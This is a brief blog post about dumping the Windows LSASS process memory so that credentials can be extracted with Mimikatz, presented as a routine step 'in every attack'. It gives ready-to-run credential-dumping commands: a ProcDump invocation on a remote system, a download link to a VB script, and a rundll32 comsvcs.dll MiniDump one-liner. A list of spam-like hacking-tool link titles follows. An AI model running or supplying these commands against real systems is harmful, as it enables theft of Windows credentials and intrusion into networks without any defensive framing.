Thursday, April 16, 2020

LSASS Dumping Methods ( For Mimikatz )


In every attack we need to get the windows credentials, this super important task. We need to target "LSASS.EXE" process and dump the process memory so that we can use it for extracting credentials using Mimikatz.


Here are some of the important methods,

Using ProcDump :

1. Favorite method of dumping is using "procdump.exe". This tool is from Microsoft Pstools
2. Download ProcDump.exe and upload in on remote system
3. Command : "procdump -ma lsass.exe lsass.dmp"


Using VB Script :

Download script from here :
https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp













rundll32 Command :

Essentially previous method VBS script is using following command for dumping Lsass.exe process

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full

So in case you do not have VB Script with you still you can fire-up the command and dump LSASS process.



















Related news


  1. Top Pentest Tools
  2. Hack Tools For Games
  3. Hacking Tools For Mac
  4. Hacking Tools For Windows 7
  5. Hacking Tools For Pc
  6. Hacker Tools For Mac
  7. Computer Hacker
  8. Pentest Automation Tools
  9. How To Hack
  10. Hacking Tools Mac
  11. Pentest Tools Find Subdomains
  12. Pentest Tools Website
  13. Hacking Tools For Windows 7
  14. Hacks And Tools
  15. Pentest Tools For Android
  16. Hacking Tools 2019
  17. Hacking App

No comments: